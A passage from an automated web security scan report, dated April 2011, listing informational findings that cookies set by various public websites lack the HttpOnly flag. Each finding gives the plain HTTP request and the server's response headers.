Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: http://media.informationgetter.com/informationgetter/i/favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=si4pwt45afstykf12odjwp45; path=/; HttpOnly
Set-Cookie: PSGUID=27712755-7ebc-4e74-957b-cf0c17dd0e01; expires=Mon, 02-May-2011 13:41:32 GMT; path=/
X-AspNet-Version: 2.0.50727
Server-Name: MIS-WEB90B
P3P: CP="CAO PSA OUR"
Date: Sat, 02 Apr 2011 13:41:32 GMT
Content-Length: 0
Set-Cookie: BIGipServerWEBFX-1=1224883210.20480.0000; path=/

14.125. http://www.intelius.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intelius.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.intelius.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:27:01 GMT
Server: Apache
Expires: Sat, 16 Apr 2011 06:27:01 GMT
Cache-Control: public
ETag: 28fbc42d6a55f25a1649eeed180b5e2d8b187633
Content-Type: image/x-icon
Set-Cookie: BIGipServerp-trans=IHtTtfLA7ZbfhKOfy7qTV8MjXwILd3g0tyuRzwPtKOEzUoz7LRmvGxfD28GJ92uoAgMg2+iCqe8RGg==; expires=Sat, 02-Apr-2011 14:57:01 GMT; path=/
Content-Length: 1150

............ .h.......(....... ..... .............................................................Y<.]Y<..Y;.    ................................................Y<..Y<..Y<..Y<..]5.C......................
...[SNIP]...
14.126. http://www.investopedia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.investopedia.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.investopedia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 14:14:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://join.investopedia.com/login/login.aspx?ReturnUrl=%2ffavicon.ico
Set-Cookie: IUTCO=bf86aaaa-c96b-4f33-87a0-070ce81ac2f2IUTCO; expires=Thu, 02-Apr-2111 14:14:24 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 187

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://join.investopedia.com/login/login.aspx?ReturnUrl=%2ffavicon.ico">here</a>.</h2>
</body></html>
14.127. http://www.iwon.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iwon.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.iwon.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:47 GMT
Server: Apache
Last-Modified: Fri, 01 Apr 2011 21:52:39 GMT
ETag: "588db-57e-49fe26db757c0"
Accept-Ranges: bytes
Content-Length: 1406
P3P: policyref="http://c4.iwon.com/w3c/p3p.xml", CP="CURa ADMa DEVa PSA PSD OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Connection: close
Content-Type: image/x-icon
Set-Cookie: ltm=2080594442.20480.0000; expires=Sat, 16-Apr-2011 13:31:46 GMT; path=/

..............h.......(....... .......................................................~.......^...................................k................................................................
...[SNIP]...
14.128. http://www.joann.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joann.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.joann.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R3374572646; path=/; expires=Sun, 03-Apr-2011 13:43:27 GMT
Date: Sat, 02 Apr 2011 13:42:35 GMT
Set-Cookie: ACE_COOKIE=R1260911085; path=/; expires=Sun, 03-Apr-2011 13:43:27 GMT
Server: Apache
Last-Modified: Fri, 23 Oct 2009 14:46:01 GMT
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 894

..............h.......(....... ...............................1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
KT)elGelGKT)1;
1;
1;
1;
1;

...[SNIP]...
14.129. http://www.jstor.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jstor.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jstor.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: TENACIOUS=R2998840958; path=/
Server: AtyponWS/7.2
ETag: "7KI7zr14ieD"
Last-Modified: Fri, 25 Jun 2010 18:23:24 GMT
Content-Length: 1150
Date: Sat, 02 Apr 2011 14:05:26 GMT

............ .h.......(....... ..... .................................................................................................]W..]W..]W..]W..]W..]W..]W..]W..]W..]W..]W..]W..................]W
...[SNIP]...
14.130. http://www.kaspersky.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kaspersky.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kaspersky.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:56:15 GMT
Content-Type: image/x-icon
Content-Length: 7078
Last-Modified: Wed, 20 Oct 2010 16:54:38 GMT
Connection: keep-alive
Vary: Accept-Encoding
Expires: Mon, 02 May 2011 13:56:15 GMT
Cache-Control: max-age=2592000
Set-Cookie: uid=AAAAA02XKv+v+6cfDs/QAg==; path=/
Accept-Ranges: bytes

...... ..........F...........(.......00..........V... ..............(... ...@.........................................................................................................................
...[SNIP]...
14.131. http://www.kbb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kbb.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kbb.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: max-age=864000
Content-Type: image/x-icon
Last-Modified: Mon, 12 May 2008 22:17:38 GMT
Accept-Ranges: bytes
ETag: "0ad7cfc7db4c81:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:25:22 GMT
Content-Length: 1150
Set-Cookie: BIGipServerpool_kbb.com=1964053514.20480.0000; path=/

............ .h.......(....... ..... ....................................................    .......................................................&z...X...]...]...V...q......2...O...+..................
...[SNIP]...
14.132. http://www.kcom.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=986389017; expires=Sun, 01-Apr-2012 13:56:57 GMT; path=/
Set-Cookie: exp_last_activity=1301749017; expires=Sun, 01-Apr-2012 13:56:57 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:56:57 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
14.133. http://www.kcom.com/contact-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /contact-us/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact-us/ HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1301749027; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.3.9.1301752673281

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1301749030; expires=Sun, 01-Apr-2012 13:57:10 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:57:11 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="Content-t
...[SNIP]...
14.134. http://www.kcom.com/contact-us/brighton  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /contact-us/brighton

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact-us/brighton HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1301749029; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.4.9.1301752673281

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1301749040; expires=Sun, 01-Apr-2012 13:57:20 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fcontact-us%2Fbrighton%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:57:21 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="Content-t
...[SNIP]...
14.135. http://www.kcom.com/large-enterprise/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /large-enterprise/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /large-enterprise/ HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; exp_last_activity=1301749016; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.1.10.1301752662

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1301749028; expires=Sun, 01-Apr-2012 13:57:08 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:57:09 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
14.136. http://www.know-where.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.know-where.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.know-where.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:48 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.1301751948535439; path=/; domain=.Know-Where.com
Last-Modified: Mon, 26 Jan 2009 06:20:00 GMT
ETag: "16668e-e36-4615cba75a400"
Accept-Ranges: bytes
Content-Length: 3638
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:45:48 GMT
Content-Type: image/x-icon

..............h...&... ..............(....... ...........@...........................EK...u:...................v.hh...!.........../...b....Q.OO......27..y{..fk.......................................
...[SNIP]...
14.137. http://www.kosmix.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kosmix.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:44 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Wed, 15 Sep 2010 16:51:21 GMT
Accept-Ranges: bytes
Content-Length: 0
Cache-Control: max-age=14400
Expires: Sat, 02 Apr 2011 17:35:44 GMT
Content-Type: image/vnd.microsoft.icon
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b545525d5f4f58455e445a4a423990;expires=Sat, 02-Apr-2011 13:37:44 GMT;path=/

14.138. http://www.life123.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.life123.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.life123.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:52:46 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Set-Cookie: cu.wz=0; Domain=.life123.com; Expires=Sun, 01-Apr-2012 13:52:47 GMT; Path=/
Set-Cookie: wz_cu=0; Domain=.life123.com; Expires=Sun, 01-Apr-2012 13:52:47 GMT; Path=/
Set-Cookie: accepting=1; Domain=.life123.com; Expires=Sun, 01-Apr-2012 13:52:47 GMT; Path=/
Set-Cookie: user=l=dir; Domain=.life123.com; Path=/
Content-Length: 58228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Articles and Answers ab
...[SNIP]...
14.139. http://www.lingospot.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lingospot.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lingospot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: LUI=979b847691af299f; Path=/; Expires=Fri, 31-Dec-2015 23:59:59 GMT; Domain=.lingospot.com
Set-Cookie: LUI=8ac36f99936b606b; Path=/; Expires=Fri, 31-Dec-2015 23:59:59 GMT; Domain=.lingospot.com
Content-Type: text/html
Content-Length: 345
Date: Sat, 02 Apr 2011 14:04:58 GMT
Server: lighttpd/1.4.15

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
14.140. http://www.livenation.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livenation.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.livenation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
X-DC-Name: 1
Last-Modified: Mon, 14 Mar 2011 17:32:52 GMT
ETag: "57e-b383d900"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: image/x-icon
Date: Sat, 02 Apr 2011 13:56:47 GMT
Connection: close
Set-Cookie: SID=2BTJPLfIONxz_QyCzXXtqiPcEHNLR9ye6p4I6jUiwZP0HADsmUGTRk2wlHX9mvWx0bbWyqbw06GMzj61; path=/; domain=www.livenation.com
Set-Cookie: BID=u5Up0YnqlxOabrt1UX2Y30Lm4tnzIQ8R8NN6T75TtaVYG3UMRLDURHbGGwVIrufof5zZA7W3RpE9V4OWi-bW; path=/; domain=www.livenation.com; expires=Fri, 01-Jan-2038 00:00:01 GMT
Set-Cookie: CMPS=wrtjQhYpNssvW6tM4p2tH1hFnY28d+BZ; path=/

..............h.......(....... ...........@...........................UI..............v... ..g`..IB..........+&..kb..........@3..ZU..LH.."...!....... .......YX..CB..........7)......b`......sj..54..?=
...[SNIP]...
14.141. http://www.livescience.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livescience.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.livescience.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:47:50 GMT
Last-Modified: Thu, 27 Jan 2011 18:08:39 GMT
ETag: "cc75b4-0-49ad7d6c937c0"
Accept-Ranges: bytes
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: TS35f02b=25108f495f8f8964c4ca00124bb14c059bc9fadf8e313eda4d9729df; Path=/

14.142. http://www.marykay.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.marykay.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 318
Content-Type: image/x-icon
Last-Modified: Thu, 10 Mar 2011 17:27:26 GMT
Accept-Ranges: bytes
ETag: "ef81c06c48dfcb1:b205e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=C7AF0F99472C520E98E3ADAFDE4C36B7; Path=/; Domain=.marykay.com
Set-Cookie: TLTSID=C7AF0F99472C520E98E3ADAFDE4C36B7; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS102
Date: Sat, 02 Apr 2011 14:18:35 GMT
Set-Cookie: www.marykay.com=537599148.20480.0000; expires=Sat, 09-Apr-2011 14:18:36 GMT; path=/

..............(.......(....... ....................................3...f...f...........................$...........\......m...wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwEwWtgEwFDu.rw4sWds%bwDDwtBtDwAGwt.
...[SNIP]...
14.143. http://www.mbnanetaccess.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mbnanetaccess.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mbnanetaccess.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:07:57 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=9C67422A5D32105D233AFD595FFC398E; Path=/; Domain=.mbnanetaccess.com
Set-Cookie: TLTUID=9C67422A5D32105D233AFD595FFC398E; Path=/; Domain=.mbnanetaccess.com; Expires=Sat, 02-04-2021 14:07:57 GMT
Content-Length: 209
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...
14.144. http://www.medscape.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.medscape.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.medscape.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:14 GMT
Server: Apache
Last-Modified: Wed, 18 Mar 2009 16:45:47 GMT
ETag: "159eef-37e-465676a5784c0"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: image/x-icon
Set-Cookie: NSC_xxx-xfc.qsg.qiy1:80=e2411a253660;expires=Sat, 02-Apr-11 15:14:14 GMT;path=/

..............h.......(....... ................................................................................o
.o
.o
..{......................o
.o
.o
.o
.o
....o
..{.............o
.............o
.o

...[SNIP]...
14.145. http://www.merck.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.merck.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.merck.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:59:16 GMT
Server: Apache
Set-Cookie: unique_visitor=173.193.214.243.1301752756681633; path=/; expires=Sun, 01-Apr-12 13:59:16 GMT
Accept-Ranges: bytes
P3P: policyref="http://www.merck.com/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OUR DELa LEG PHY ONL UNI COM NAV INT DEM STA HEA PRE LOC"
Content-Type: text/html
Set-Cookie: BIGipServerwww.merck.com-HTTP=42274988.20480.0000; path=/
Content-Length: 40209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=u
...[SNIP]...
14.146. http://www.modelmayhem.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.modelmayhem.com
Path:   /favicon.ico

